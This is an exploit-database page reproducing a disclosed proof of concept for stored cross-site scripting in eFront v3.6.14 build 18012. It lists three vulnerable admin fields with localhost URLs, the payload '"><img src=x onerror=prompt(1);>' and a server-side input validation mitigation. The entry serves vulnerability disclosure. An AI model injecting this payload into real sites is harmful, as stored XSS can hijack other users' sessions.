header-logo
Suggest Exploit
vendor:
eFront
by:
sajith
7,5
CVSS
HIGH
Stored XSS
79
CWE
Product Name: eFront
Affected Version From: eFront v3.6.14- build 18012
Affected Version To: eFront v3.6.14- build 18012
Patch Exists: NO
Related CWE: N/A
CPE: efront_3.6.14_build18012_community
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

eFront v3.6.14 (build 18012) -Stored XSS in multiple Parameters

eFront v3.6.14 (build 18012) is vulnerable to stored XSS in multiple parameters. An attacker can inject malicious payloads into the Last Name, Lesson Name and Course Name fields. The payload used is '"><img src=x onerror=prompt(1);>'

Mitigation:

Input validation should be done on the server-side to prevent malicious payloads from being injected into the fields.
Source

Exploit-DB raw data:

###########################################################

Exploit-DB Note: Screenshot provided by exploit author.

###########################################################
[~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple
Parameters
[~] Author: sajith
[~] version: eFront v3.6.14- build 18012
[~]Vendor Homepage: http://www.efrontlearning.net/
[~] vulnerable app link:http://www.efrontlearning.net/download
###########################################################



POC by sajith shetty:

[###]Log in with admin account and create new user

http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1

(Home � Users � Administrator S. (root) � New user)

Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x
onerror=prompt(1);>  ]



[###]create new lesson option (
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?

ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss

[payload:"><img src=x onerror=prompt(1);>  ]



[###]create new courses option(
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?

ctg=courses&add_course=1) where "Course name:" filed is vulnerable to
stored XSS

Navigation

Suggest Exploit

Services By CQR